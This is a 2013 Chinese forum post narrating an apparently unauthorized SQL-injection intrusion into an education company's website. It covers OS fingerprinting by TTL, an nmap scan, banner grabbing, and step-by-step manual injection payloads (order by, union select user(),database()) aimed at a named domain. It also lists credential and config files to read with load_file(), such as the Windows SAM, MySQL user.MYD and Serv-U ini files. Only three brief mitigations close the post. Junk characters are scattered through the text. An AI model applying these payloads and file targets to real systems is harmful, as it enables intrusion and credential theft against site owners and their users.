找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2206|回复: 0
打印 上一主题 下一主题

记一次Linux系统PHP注入入侵检测

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 22:23:32 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
题记:# {- k: L( |1 c2 ]* x$ f& f
一位朋友在某教育公司,一套网络教育平台。一年前,在2008年8月份的时候,我看到了这套平台,当时发现了个注入漏洞,测试了一下,得到一个可用帐户后就没有再继续下去。今天7月,又说到此事,我决定继续下去……, N9 h) r4 {/ g  O  x* Z
第一步:获取需要的信息
# e: a( O3 z- k# Z由于之前测试过,知道此系统某处存在SQL注入漏洞。但由于时隔一年,岁月的远去已经深深的隐藏了那个SQL注入漏洞的地址,现在需要重新收集服务器有用信息。1 A! @% [+ {3 K7 g1 o$ {6 O
注:以下为保护特用XXX代替敏感信息" W$ d6 T4 G* I9 X7 X
顺手先PING了一下他们的域名:& B! u% R, G0 Q+ i  q
ping XXX.XXX.XXX.XXX(本文约定:用XXX.XXX.XXX.XXX代表测试IP和域名)
( `5 H) D5 x" s1 C' N  f64 bytes from *********: icmp_seq=1 ttl=246 time=1.87 ms
* Y% t1 x  V7 d1 k5 f顺便了解一下TTL,学好基础知识才能一路顺风:
. s1 h% N4 c: L" O& w5 P5 h2 sTTL:(Time To Live ) 生存时间$ P% @2 a' U- B6 d4 u+ U
指定数据包被路由器丢弃之前允许通过的网段数量。
7 Y( `: d% M5 }. }TTL 是由发送主机设置的,以防止数据包不断在 IP 互联网络上永不终止地循环。转发 IP 数据包时,要求路由器至少将 TTL 减小 1。: O* d- m% o8 u0 _# e, t6 \
使用PING时涉及到的 ICMP 报文类型
) d1 J  t# ^3 X一个为ICMP请求回显(ICMP Echo Request). I* G. x/ J' V7 q* v$ Q
一个为ICMP回显应答(ICMP Echo Reply)
- J# a( ]% P1 H- TTTL 字段值可以帮助我们识别操作系统类型。( [. k9 M  W' ?% D3 a7 A
UNIX 及类 UNIX 操作系统 ICMP 回显应答的 TTL 字段值为 255
4 u4 J3 b3 t. ^/ d0 k. |( uCompaq Tru64 5.0 ICMP 回显应答的 TTL 字段值为 64# \3 l& I. ~9 m5 y( P  z
微软 Windows NT/2K操作系统 ICMP 回显应答的 TTL 字段值为 128
! F  Z! T% e5 M# S微软 Windows 95 操作系统 ICMP 回显应答的 TTL 字段值为 32, K. O; v6 @  U3 x
当然,返回的TTL值是相同的
% D" ~" n: C8 S1 ]5 C1 z: f/ O但有些情况下有所特殊& r+ u* B+ X4 x; E8 q/ X5 q
LINUX Kernel 2.2.x & 2.4.x ICMP 回显应答的 TTL 字段值为 64  g) ^4 [. g' \9 g, x5 E/ a
FreeBSD 4.1, 4.0, 3.4;
4 _8 m% T# i9 x9 |1 b# x9 h! NSun Solaris 2.5.1, 2.6, 2.7, 2.8;
4 M# a; y) F' e- ZOpenBSD 2.6, 2.7,
  T9 X  t" \0 P1 ]NetBSD9 F8 h/ {  B* \: m# B
HP UX 10.20
3 P+ G0 Z) U" |4 A8 `ICMP 回显应答的 TTL 字段值为 255& {' o. [" X/ Y$ a/ g5 l1 S
Windows 95/98/98SE
! Z: D. j/ L  Z, H6 n$ N# z9 s6 AWindows ME
9 j, X0 c0 O, w$ _2 AICMP 回显应答的 TTL 字段值为 32% @9 ~' }- b; _4 e
Windows NT4 WRKS
' x4 G2 J" X6 h5 W% Y0 i+ rWindows NT4 Server
. ?" e* V# B  n; O. _Windows 2000
- y) Q) D! i  r3 hWindows XP9 F3 y6 y+ z% ]! e$ J! Z
ICMP 回显应答的 TTL 字段值为 128
" |3 @) s0 b/ `, O这样,我们就可以通过这种方法来辨别操作系统
1 E  j; l% r& L1 N7 y! WTTL值的注册表位置HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Services\Tcpip\Parameters 其中有个DefaultTTL的DWORD值,其数据就是默认的TTL值了,我们可以修改,但不能大于十进制的255+ e3 p  h0 V6 Z: C5 T
用NMAP扫描一下:2 y. D% X  M- ^' V, z' ^' ?+ Y
nmap -sT -O XXX.XXX.XXX.XXX' X& f& `# C( K, n9 O$ _( }/ B
如果没有装WinPcap则会弹出提示:+ W3 t& i8 E/ M. M  Y4 e# n& D5 a0 N
WARNING: Could not import all necessary WinPcap functions.  You may need to upgr
3 v- C, I7 c$ ^9 P3 l6 T2 Gade to version 3.1 or higher from http://www.winpcap.org.  Resorting to connect(
; m  t* z* t  h- u% w) mode — Nmap may not function completely
5 E* x1 ~+ _# Q, ~+ h5 \TCP/IP fingerprinting (for OS scan) requires that WinPcap version 3.1 or higher
' [) H( |( m: \4 ?; vand iphlpapi.dll be installed. You seem to be missing one or both of these.  Win
6 M: n9 O  ?  d4 q' Lpcap is available from http://www.winpcap.org.  iphlpapi.dll comes with Win98 an
  u9 d7 t; o, U( ~9 ud later operating sytems and NT 4.0 with SP4 or greater.  For previous windows v
" ~$ b& H+ B/ [3 Lersions, you may be able to take iphlpapi.dll from another system and place it i
& L- |0 T+ F; y. A+ U; a6 Wn your system32 dir (e.g. c:\windows\system32).
. ]' ]! K4 h" Y. ?* g$ tQUITTING!
, e4 k6 E/ a8 F  [到这里下载: http://www.winpcap.org/install/bin/WinPcap_4_1_1.exe) m  e5 @4 j; t( `2 U
安装后继续执行刚才的命令,等待扫描完毕后得到入下信息:
) w, N/ N) G- z( Y" @, d4 l* P$ yInteresting ports on XXX.XXX.XXX.XXX:
2 ]* W# E& ]9 a$ \9 }% z8 |Not shown: 986 closed ports
! T( v6 N% S. M3 H1 Q# F& s1 }PORT     STATE    SERVICE" @0 S7 \; c4 ^
21/tcp   open     ftp
* x7 F3 O7 n+ s" I22/tcp   open     ssh! ^! I: l" g4 X3 ?# |
23/tcp   open     telnet
; n3 H; Z6 B. I/ r7 E  j80/tcp   open     http3 ]3 w# B5 A  d0 F5 p1 S
111/tcp  open     rpcbind6 ], x: o/ H' s6 c- W
135/tcp  filtered msrpc) E2 J8 Y  {1 M5 u  D  A
139/tcp  filtered netbios-ssn' f; x0 `2 l0 b4 y
445/tcp  filtered microsoft-ds- t: }0 w7 s" _8 ~2 o' T$ e
513/tcp  open     login
& C* B1 f! _4 w- S514/tcp  open     shell6 Y0 J5 P* J. g/ e) P( m9 v
593/tcp  filtered http-rpc-epmap
5 o% `" G3 I8 z/ T1720/tcp filtered H.323/Q.931
/ L  ^0 x# c. _+ i) s$ @3306/tcp open     mysql
0 f* R- v0 Z, }; O2 o" u4 I( j4444/tcp filtered krb524
# S& N. }: M6 ]0 a3 Z9 ODevice type: WAP
1 i0 l' X" N- d5 l8 |$ P* LRunning: Linux 2.4.X$ k) }; h* g% k& J/ i! @
OS details: DD-WRT (Linux 2.4.35s)/ l  _: m& z* B& g
Network Distance: 13 hops# l: I3 [0 J' X1 c. q/ f6 w% `
看到SSH22端口是开着的,打开putty试一下,看是否可以正常连接:
: h% j0 M% Z% ~& }login as:* I/ {/ A9 n4 m% E
Telnet23端口也是开着的,用telnet 命令链接一下:
- c% k( B5 Q5 Atelnet XXX.XXX.XXX.XXX! V/ |$ F- P& ?
提示:
; j2 f! P! z: R, i3 U  p) H9 P' TRed Hat Enterprise Linux Server release 5.2 (Tikanga)
1 ]  S; F$ G2 G. oKernel 2.6.18-92.el5PAE on an i686
. ^! I: r4 j. l, L5 z! f# Ilogin:3 B  f& C  R, X. U0 _4 b
获取HTTP头信息:
# ]& O" Y' K2 O  l/ R在本地执行如下PHP代码& w' v1 s) T- X
<?php
& @$ J- |0 @/ v/ p  j$url = ‘XXX.XXX.XXX.XXX’;
5 K, D" m0 z, i+ n, Nprint_r(get_headers($url));  I4 ^- k4 z4 m2 h+ W0 F
print_r(get_headers($url, 1));
. {6 }4 u4 v! c?>
% l+ m/ r! S+ C0 K将以上代码保存为PHP文件,执行:
% t$ A3 {# }0 N. T4 g, gArray ( [0] => HTTP/1.1 200 OK [1] => Server: nginx/0.7.61 [2] => Date: Mon, 02 Nov 2009 09:06:48 GMT [3] => Content-Type: text/html; charset=gb2312,gbk,utf-8 [4] => Content-Length: 75 [5] => Last-Modified: Thu, 20 Aug 2009 19:35:37 GMT [6] => Connection: close [7] => Accept-Ranges: bytes ) Array ( [0] => HTTP/1.1 200 OK [Server] => nginx/0.7.61 [Date] => Mon, 02 Nov 2009 09:06:48 GMT [Content-Type] => text/html; charset=gb2312,gbk,utf-8 [Content-Length] => 75 [Last-Modified] => Thu, 20 Aug 2009 19:35:37 GMT [Connection] => close [Accept-Ranges] => bytes )
+ T$ R# R! ~+ b2 F现在可以得出结论:& x6 g4 {$ J. w
系统版本:Red Hat Enterprise Linux Server release 5.2 (Tikanga)/ ]  k  c9 |4 M7 ]- o
内核版本:Kernel 2.6.18-92.el5PAE on an i686
/ X+ b/ y  {4 ], n0 y& f+ }8 UWEB服务器版本:nginx/0.7.61
# o, `7 R1 C* k2 }# `第二步,开始测试寻找漏洞0 D0 ]$ E" {8 S# H9 B
分析是否存在注入漏洞,因为上次曾发现存在过,所以注入则是我们的首选。
( b6 K1 D5 Z8 F& _! g; Y1、敏感地址:站内存在有类似:http://www.fovweb.com/XXX.php?id=123 这种地址,属动态传参的  F" n1 F/ |4 d5 |* o( e, P
2、测试方法:在地址后加 and 1=1 和 and 1=2 测试
7 |& w" m( n8 I  P; h! }* Jhttp://www.fovweb.com/XXX.php?id=123 and 1=1 返回正常3 ]3 n- ^9 e% t8 d2 p4 I! O3 E" D% b
http://www.fovweb.com/XXX.php?id=123 and 1=2 返回错误1 t- A! w  ]9 C' F5 v3 n" }! `$ D9 Z
恭喜,两次返回结果不同,则很有可能存在未过滤敏感字符而存在SQL注入漏洞,我们继续  Q2 g) m6 {# ?' }, w; ^
3、手工注入:
  y4 N' x) b3 ~$ {* K: @8 g注入也应该有个思路,不能随便碰运气,要记住入侵检测不是靠运气而走下去的,要靠的是清晰的思路、过硬的技术、很全的知识面。% U& h9 k, H) s' r" B
3.1 猜测当前表字段数
, [3 ?3 m9 B2 `http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 10
9 V* u% d. r9 N- V4 }此处猜测有个简单的算法,都是有技巧的吗,呵呵
7 |# b: n( M& [5 J  S/ u8 R3 u算法简单如下:
- `. k. D+ a" s8 N; P第一步:根据页面信息,大概估算一个数值,这个是要靠一定的经验了;
7 a+ o7 ]; f$ }第二步:取中算法,好比是10,如果返回错误,则取中间值5进行下一次猜测;& @  ?" J$ j0 M/ [, ~
需要注意:如果所选数值在字段数范围内即小于等于,则会(返回正常);如果所选数值在字段范围外即大于等于,则会(返回错误)。, C$ {, X# g2 x6 B
以此来判断,是否过界,配合取中算法猜出字段数。
* f$ t  h# \1 E% J0 N( u9 o1 J举例:
* U& `8 e0 t% _1 f2 A" p1 shttp://www.fovweb.com/XXX.php?id=123 and 1=1 order by 3 返回正常
: B' Y" W6 z; a( _4 J! W; c! o% Qhttp://www.fovweb.com/XXX.php?id=123 and 1=1 order by 4 返回错误
, p$ N# O( y6 g& Y9 M: r此时3则为我们要找的字段数。( q2 s$ v: m8 l
3.2 配合union联合查询字段在页面所位置" [0 l! Y4 C" w- {6 s# H
我们已经知道了字段数为3,此时则可以做如下操作:- j: W+ [, ?: X/ S  s, [& U- H
http://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,2,3
% c& n' ?" x! }) d2 V% d! {8 V4 e& o
这样就可以测试到哪些字段在页面上有所显示了,如图:
5 N# O& {3 ~' L; T' k5 Z4 R
& W# q3 Q$ l- t$ l$ K, L: p. C3.3 查敏感信息8 B+ ?9 s$ S. E) Y0 }7 a/ S
这也是个思路问题,我们需要什么,其实到了这一步已经能做什么多事情了。4 Y9 N! u/ D7 ~7 X2 l, O1 ^* E2 D
http://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,user(),database()
  {* z8 Y3 j  I; l$ ]2 d* S3.3.1 先查数据库用户、数据库名,以备后用,如图:
% G2 K! `6 @2 g" R1 n$ Q0 L- O4 v% G+ x6 d2 d8 b1 t
得到数据库用户为root、数据库名为DBxx;
, t; f+ e0 u& N1 h# C+ y' K3.3.2 查配置文件
8 S6 `( d2 I! K( A3 G查配置文件,就是指查看系统敏感的文件,如web服务器配置文件等。/ g/ Z2 r. C. @& t) M5 w! O4 J
查看文件有一定的条件限制:
5 [4 \' \1 J3 c7 r/ m/ u欲读取文件必须在服务器上
9 w' [9 ^0 V$ [6 x9 U9 r必须指定文件完整的路径
5 C9 \) p8 \3 ~8 ^4 X必须有权限读取并且文件必须完全可读
+ c4 h% ?0 J- K9 i欲读取文件必须小于 max_allowed_packet
- W, o( l- v7 _MYSQL注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件。
' T) J5 Q" y* U$ k常用的一些:0 K$ w+ u3 P9 R, l# i5 I* j
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
( n2 {( o- W9 ~3 @$ G3 D/usr/local/apache2/conf/httpd.conf
: I/ R1 y( ]% k0 y0 p% D" L8 j/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
. |& G: M) `8 `! X# S& Q1 _  K  Z7 P/usr/local/app/php5/lib/php.ini //PHP相关设置: D& T3 }" A( {& {. Z( l
/etc/sysconfig/iptables //从中得到防火墙规则策略
$ W* }* I; C# z. f/etc/httpd/conf/httpd.conf // apache配置文件
* M& }  e' X. K8 J/etc/rsyncd.conf //同步程序配置文件. Y- p, q& O1 y
/etc/sysconfig/network-scripts/ifcfg-eth0 //查看IP.0 z! y4 y# Z- `7 k
/etc/my.cnf //mysql的配置文件: y* s' t3 ^$ O" ~( p
/etc/redhat-release //系统版本
% x4 u3 n+ X! t6 O1 f/etc/issue
; U4 {5 |. s" p, f/etc/issue.net
6 D7 o% y7 U2 a% I% mc:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码
/ d; U" E* e0 r6 Y2 xc:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码
+ H5 F$ P4 K" N! l/ T5 W, U8 B+ f+ l  bc:\Program Files\Serv-U\ServUDaemon.ini
, I( S, ^* H0 B' `/ J. n  |c:\windows\my.ini //MYSQL配置文件
' R3 E# e/ m0 ?+ E- Dc:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件3 n2 x1 b1 B0 G4 \
等等。实际上,load_file()的作用不止于此,它还可以用来读取系统中的二进制文件,' W8 Q5 e* a7 r: H' _* d
c:\windows\repair\sam //存储了WINDOWS系统初次安装的密码2 a+ |" h& V/ |! |7 f3 M3 ~7 h
c:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此
; J  e& r, P- O$ I9 Y; W( qc:\Program Files\RhinoSoft.com\ServUDaemon.exe
# {* u" `  N2 |4 ?1 c) ^C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
' s( I/ R8 t4 S4 }2 d) G8 V//存储了pcAnywhere的登陆密码
% ]& C$ M# |# y/ V$ w由于之前得到信息,此台服务器是采用的nginx做的Web服务器,那我们就来试着找一下nginx的安装路径吧。
6 b; v/ M; }( w这个没有技术性可言,纯靠经验和运气,由于很少用nginx不了解,我就先到网上搜索常用的安装路径,以及比较好的配置文档中的安装路径进行测试,最终,得到nginx安装路径“/usr/local/nginx/conf/nginx.conf”。
* i& f" J* M; v最后:防范措施
7 ~8 [* X1 g3 r: n4 `3 O1、修复PHP注入漏洞;
- w& M* P. [8 k2、Mysql使用普通权限的用户;
+ m9 }: d! y( _% d' P' ^3、升级linux内核至最新版本;
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表